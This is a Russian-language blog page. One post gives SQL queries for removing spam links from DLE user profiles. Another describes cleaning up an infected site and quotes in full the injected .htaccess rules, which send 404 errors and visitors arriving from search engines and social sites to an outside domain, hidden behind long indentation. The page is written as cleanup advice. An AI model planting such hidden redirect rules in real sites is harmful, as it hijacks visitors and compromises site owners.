Удаляем ссылки в профилях пользователей на сайтах под управлением DLE

Недавно, на одном купленном мною проекте под управлением DLE, возникла проблема — необходимо было удалить все профили пользователей, содержащие ссылки на сторонние ресурсы.

Задача оказалась крайне простой — буквально 5 минут работы 😉

1. Лезем в phpmyadmin, авторизуемся, заходим в базу данных сайта.
2. Находим таблицу dle_users
3. Проверяем наличие профилей с ссылками, задавая следующий sql-запрос:
select * from `dle_users`
where (`info` like '%http://%') or (`signature` like '%http://%')

(обычно спамеры оставляют ссылки в инфе о себе или в подписи.
4. Задаем sql-запрос на удаление этих профилей:
delete from `dle_users`
where (`info` like '%http://%') or (`signature` like '%http://%')

Вуаля, проблема решена.

5*) Можно так же просто очистить все ссылки из профилей, без удаления самих пользователей:
update `dle_users`
set `info`='', `signature`=''
where (`info` like '%http://%') or (`signature` like '%http://%')

Внимание!
Скажем так, данные решения не самые точные. Могут и добропорядочные пользователи под раздачу попасть, так что пользуйтесь данными советами аккуратно.

last comments
slava
slava

Спасибо! давно чтото подобное искал ща попроббуем что это даст.. Надеюсь что поможет ато не охота сами профели удолять.

Первый пост. Про peace-security.ru

Приветствую Вас на страницах своего блога. Скорее всего, сюда вы попали с моего прошлого блога 4partners. Переезд на новый блог состоялся по одной простой причине — старое название мне разонравилось :-), к тому же оно не описывало идею блога.

Этот блог надеюсь вести регулярно, описывая больше практическую сторону заработка в интернете, добавляя переводы интересных англоязычных статей и обзоры свежих новостей SEO.

Долго думал, о чем бы написать первый пост (окромя приветственных речей), но тут подвернулась одна проблема, с которой столкнулся буквально позавчера.

Симптомы: При вводе несуществующего адреса на вашем проекте (напр. http://www.VASH-BLOG.ru/abracadabra) — происходит редирект на http://peace-security.ru/mod/index.php

Решение проблемы: Столкнувшись с данным вопросом решение обнаружил не сразу. Выяснилось, что в коде файла .htaccess прописывается следующая гадость:

ErrorDocument 400 http://peace-security.ru/mod/index.php
ErrorDocument 401 http://peace-security.ru/mod/index.php
ErrorDocument 403 http://peace-security.ru/mod/index.php
ErrorDocument 404 http://peace-security.ru/mod/index.php
ErrorDocument 500 http://peace-security.ru/mod/index.php
 
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://peace-security.ru/mod/index.php [R=301,L]

Есть один маленький нюанс — данные директивы прописываются в файл .htaccess с большими оступлениями от начала строки… поэтому просто сделайте поиск по файлу — и смело удаляйте и директивы и пустые строки.

Одним из способов обнаружить заражение является появление большого количества .htaccess файлов во всех каталогах вашего сайта.